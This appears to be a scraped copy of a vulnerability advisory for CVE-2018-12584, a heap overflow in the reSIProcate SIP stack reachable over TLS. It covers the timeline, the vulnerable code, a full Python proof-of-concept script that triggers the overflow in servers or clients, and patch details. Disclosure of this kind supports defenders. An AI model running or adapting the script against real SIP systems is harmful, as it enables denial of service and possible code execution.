扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 |
''' CVE ID: CVE-2018-12584 TIMELINE Bug report with test code sent to main reSIProcate developers: 2018-06-15 Patch created by Scott Godin: 2018-06-18 CVE ID assigned: 2018-06-19 Patch committed to reSIProcate repository: 2018-06-21 Advisory first published on website: 2018-06-22 Advisory sent to Bugtraq mailing list: 2018-08-08 DESCRIPTION A heap overflow can be triggered in the reSIProcate SIP stack when TLS is enabled. Abuse of this vulnerability may cause a denial of service of software using reSIProcate and may also lead to remote code execution. No SIP user authentication is required to trigger the vulnerability on the client or server side. TECHNICAL DETAILS The file resiprocate/resip/stack/ConnectionBase.cxx contained the following code fragment: bool ConnectionBase::preparseNewBytes(int bytesRead) { /* ... */ else if (mBufferPos == mBufferSize) { // .bwc. We've filled our buffer; go ahead and make more room. size_t newSize = resipMin(mBufferSize*3/2, contentLength); char* newBuffer = 0; try { newBuffer=new char[newSize]; } catch(std::bad_alloc&) { ErrLog(>>"Failed to alloc a buffer while receiving body!"); return false; } memcpy(newBuffer, mBuffer, mBufferSize); mBufferSize=newSize; delete [] mBuffer; mBuffer = newBuffer; } /* ... */ } Execution of the code above could be triggered by sending a partial SIP message over TLS with a Content-Length header field, followed by sending a packet over TLS with its associated SIP message body. By setting the Content-Length field to a value that is lower than the length of the SIP message body which followed, a malicious user could trigger a heap buffer overflow. The bug did not appear to be reproducible using TCP instead of TLS even when the TCP packets were sent with delays between them. TEST CODE The following Python script can be used to test the vulnerability of both server and client software based on reSIProcate. ''' #!/usr/bin/python3 # reSIProcate through 1.10.2 SIP over TLS heap overflow bug test code # Written by Joachim De Zutter (2018) from socket import * from ssl import * # pip install pyopenssl daemon_mode = False # server to test (in case daemon_mode = False) server = "" port = 5061 # server configuration (in case daemon_mode = True) server_ip = "xxx.xxx.xxx.xxx" keyfile = "keyfile.pem" certfile ="certfile.pem" username = "test" via = "192.168.13.37:31337" callid = "LtCwMvc2C5tca58a5Ridwg.." cseq = 1 def trigger_server_heap_overflow(connection): global username, server, via, cseq print("Triggering heap overflow!") buffer_length = 100 register_packet = "REGISTER sip:" + server + " SIP/2.0\x0d\x0aVia: SIP/2.0/TCP " + via + "\x0d\x0aContact: <sip:" + username + "@" + via + ">\x0d\x0aTo: <sip:" + username + "@" + server + ";transport=TCP>\x0d\x0aFrom: <sip:" + username + "@" + server + ">\x0d\x0aCSeq: " + "%d" % cseq + " REGISTER\x0d\x0aExpires: 600\x0d\x0aContent-Length: %ld" % buffer_length + "\x0d\x0a\x0d\x0a" oversized_packet = buffer_length * "A" + 64 * "B" connection.send(register_packet.encode()) cseq = cseq + 1 connection.send(oversized_packet.encode()) def trigger_client_heap_overflow(connection): global username, via, callid, cseq print("Triggering heap overflow!") buffer_length = 100 content_length_packet = "SIP/2.0 200 OK\x0d\x0aVia: SIP/2.0/TLS 10.0.2.15:32703;branch=z9hG4bK-524287-1---c04a0ad2231e66ab;rport\x0d\x0aFrom: <sip:" + username + "@" + via + ";transport=TLS>;tag=00649d4d\x0d\x0aTo: <sip:" + username + "@" + via + ";transport=TLS>\x0d\x0aCall-ID: " + callid + "\x0d\x0aCSeq: 2 PUBLISH\x0d\x0aExpires: 600\x0d\x0aContent-Length: %ld" % buffer_length + "\x0d\x0aSIP-ETag: af6079e42f65e7e2340e92565570e295\x0d\x0a\x0d\x0a" oversized_packet = buffer_length * "A" + 64 * "B" connection.send(content_length_packet.encode()) cseq = cseq + 1 connection.send(oversized_packet.encode()) connection.shutdown(SHUT_RDWR) connection.close() def test_clients(): global server_ip, keyfile, certfile server_socket=socket(AF_INET, SOCK_STREAM) server_socket.bind((server_ip, 5061)) server_socket.listen(1) tls_server = wrap_socket(server_socket, ssl_version=PROTOCOL_TLSv1, cert_reqs=CERT_NONE, server_side=True, keyfile=keyfile, certfile=certfile) print("Server running!") done = False while not done: connection, client_address= tls_server.accept() print("Connection from " + client_address[0] + ":%d" % client_address[1]) data_in = connection.recv(1024) if not data_in: done = True break message = data_in.decode() if "SUBSCRIBE" in message: print("Client sent SUBSCRIBE request") trigger_client_heap_overflow(connection) def test_server(): global server, port context = create_default_context() context.check_hostname = False context.verify_mode = CERT_NONE tls_client = context.wrap_socket(socket(AF_INET), server_hostname=server) tls_client.connect((server, port)) print("Connected!") trigger_server_heap_overflow(tls_client) tls_client.shutdown(SHUT_RDWR) tls_client.close() def main(): global daemon_mode if daemon_mode: test_clients() else: test_server() if __name__ == "__main__": main() ''' EXPLOITABILITY At http://joachimdezutter.webredirect.org/CVE-2018-12584-exploitability.html the exploitability of an affected version of repro on Windows XP Professional with Service Pack 3 was examined, it was separated from this text because AVG Web Shield considered the text to be a threat. Arbitrary code execution has proven to be possible and may be possible on other operating systems and software based on affected versions of reSIProcate as well. SOLUTION A patch was created by Scott Godin, it was committed to the reSIProcate repository at https://github.com/resiprocate/resiprocate/commit/2cb291191c93c7c4e371e22cb89805a5b31d6608 The following software based on reSIProcate contains a fix for the issue: 3CX Phone System 15.5.13470.6 and higher For Debian 8 "Jessie", CVE-2018-12584 and CVE-2017-11521 have been fixed in resiprocate package version 1:1.9.7-5+deb8u1 (https://lists.debian.org/debian-lts-announce/2018/07/msg00031.html) DISCLAIMER The information in this report is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ''' |
体验盒子
